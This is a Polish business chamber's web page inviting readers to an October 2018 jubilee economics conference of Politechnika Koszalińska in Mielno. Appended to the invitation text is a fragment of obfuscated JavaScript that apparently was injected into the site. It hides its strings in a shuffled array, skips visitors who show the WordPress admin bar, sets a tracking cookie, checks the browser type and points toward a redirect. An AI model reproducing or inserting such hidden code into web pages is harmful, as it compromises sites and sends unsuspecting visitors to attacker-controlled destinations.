Jubileuszowa Konferencja Wydziału Nauk Ekonomicznych Politechniki Koszalińskiej | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

              Kolegium Dziekańskie Wydziału Nauk Ekonomicznych Politechniki Koszalińskiej ma zaszczyt zaprosić Państwa do uczestnictwa w Konferencji Naukowej pt. „Szanse i zagrożenia dla gospodarki europejskiej XXI wieku z uwzględnieniem problemów regionalnych” organizowanej z okazji Jubileuszu 25-lecia Wydziału. Konferencja odbędzie się w dniach 18-19 października 2018 roku w Royal Park Hotel & SPA w Mielnie.

               W ramach uroczystości jubileuszowej obchodzone będzie również 60-lecie istnienia Polskiego Towarzystwa Ekonomicznego Oddział w Koszalinie. Wspomniane uroczystości będą połączone z wyjazdowym posiedzeniem członków Zarządu Krajowego PTE, w związku z tym będziemy gościć Panią prof. dr hab. Elżbietę Mączyńską – Prezes PTE oraz wielu wybitnych profesorów z dziedziny ekonomii i zarządzania.

               Będzie to okazja do zaprezentowania poglądów nt. współczesnych (i przyszłych) szans i zagrożeń dla gospodarki europejskiej zarówno przez naukowców, przedstawicieli świata biznesu, polityków oraz reprezentantów władz lokalnych i krajowych. Więcej informacji w ulotce i pod linkiem: http://wne.tu.koszalin.pl/konferencja/

Polnocna-Izba-zaporszenie-na-konferencje-WNE

Północna Izba Gospodarcza objęła patronat honorowy nad konferencją. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m